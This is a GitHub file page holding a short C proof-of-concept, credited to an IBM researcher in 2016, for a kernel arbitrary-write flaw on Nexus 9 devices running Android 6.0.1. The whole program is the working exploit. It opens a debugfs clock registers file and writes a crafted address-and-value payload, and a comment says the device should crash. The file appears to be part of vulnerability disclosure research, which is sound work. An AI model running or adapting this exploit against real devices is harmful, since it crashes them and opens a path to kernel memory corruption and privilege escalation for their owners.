Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
40 lines (32 sloc) 967 Bytes
// POC for Kernel Arbitrary Write
//
// TESTED ON:
// [ro.build.fingerprint]:
// google/volantisg/flounder:6.0.1/MOB30M/2862625:user/release-keys
// google/volantisg/flounder_lte:6.0.1/MOB30M/2862625:user/release-keys
//
// Sagi Kedmi (@sagikedmi), 20.06.2016, IBM.
#define DBGFS_REGISTERS "/sys/kernel/debug/clock/dfll_cpu/cl_dvfs/registers"
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int main (void){
int fd;
char *payload = "[0x44444444]=0x12341234\0";
if ((fd = open(DBGFS_REGISTERS, O_WRONLY)) < 0){
perror("Can't open dbgfs virtual file.");
return EXIT_FAILURE;
}
if (write(fd, payload, strlen(payload)) != strlen(payload)){
perror("Failed to write payload entirely.");
close(fd);
return EXIT_FAILURE;
}
close(fd);
// Nexus 9 should crash now.
return EXIT_SUCCESS;
}